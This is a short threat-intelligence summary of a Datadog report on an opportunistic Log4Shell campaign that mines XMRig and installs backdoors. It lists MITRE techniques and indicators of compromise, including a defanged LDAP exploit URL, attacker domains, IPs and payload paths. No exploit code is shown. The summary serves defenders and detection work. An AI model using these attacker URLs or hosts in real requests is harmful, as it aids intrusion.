Threat Research

The Endless Gift: A New Opportunistic Log4j Campaign | Datadog Security Labs

Securonix

Two years after the Log4j vulnerability known as Log4Shell, opportunistic campaigns continue to exploit it for crypto-mining and system compromise, using obfuscated LDAP requests to run malicious scripts that establish persistence, reconnaissance, and data exfiltration. This report highlights how backdoors and encrypted channels aid ongoing post-exploitation activity. #Log4Shell #APT41

Keypoints

  • Log4Shell (CVE-2021-44228) has a CVSS score of 10, indicating severe risk.
  • Threat actors including nation-state groups and cybercriminals exploit Log4j vulnerabilities.
  • Recent campaigns use Log4Shell for crypto-mining operations (XMRig).
  • Obfuscated LDAP requests are used to evade detection during exploitation.
  • Malicious scripts establish persistence (systemd services or cron jobs) and maintain control via backdoors.
  • Data exfiltration is performed via HTTP POST requests to remote servers, with reconnaissance and encrypted-like channels involved.

MITRE Techniques

  • [T1203] Execution – Exploitation of the Log4j vulnerability to execute remote code. “The attack payload is a conventional exploit targeting the Log4j vulnerability, with slight obfuscation to evade detection.”
  • [T1543] Persistence – Setting up systemd services or cron jobs for persistent execution. “Setting up systemd services or cron jobs for persistent execution.”
  • [T1041] Exfiltration – Exfiltrating data via HTTP POST requests to remote servers. “Exfiltrating data via HTTP POST requests to remote servers.”
  • [T1070] Defense Evasion – Clearing bash history and removing malicious scripts to evade detection. “Clearing bash history and removing malicious scripts to evade detection.”
  • [T1081] Credential Access – Collecting user information and system details for further exploitation. “Collecting user information and system details for further exploitation.”

Indicators of Compromise

  • [IP] context – 185.220[.]101[.]34, 185.159[.]82[.]103:8000
  • [Domain] context – superr[.]buzz, nfdo[.]shop, cmpnst[.]info, rirosh[.]shop
  • [URL] context – ldap://44-211-80-168-i80.superr[.]buzz:1389/rmr, http://185.159.82[.]103:8000/xExportObject.class, http://nfdo[.]shop/lte, http://nfdo[.]shop/componist
  • [Hash] context – 5441be217e98051c284d584e830f9a7fc2153143fafee0dc9f6af197cec6c8c9, 2ac2877c9e4cd7d70673c0643eb16805977a9b8d55b6b2e5a6491db565cee1f, 4f11db82193aebe710585b2faefd2b904b6fe6636f7dc25541cea0dd31adada4
  • [File] context – /tmp/lte, /bin/componist

Read more: https://securitylabs.datadoghq.com/articles/the-gift-that-keeps-on-giving-a-new-opportunistic-log4j-campaign/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint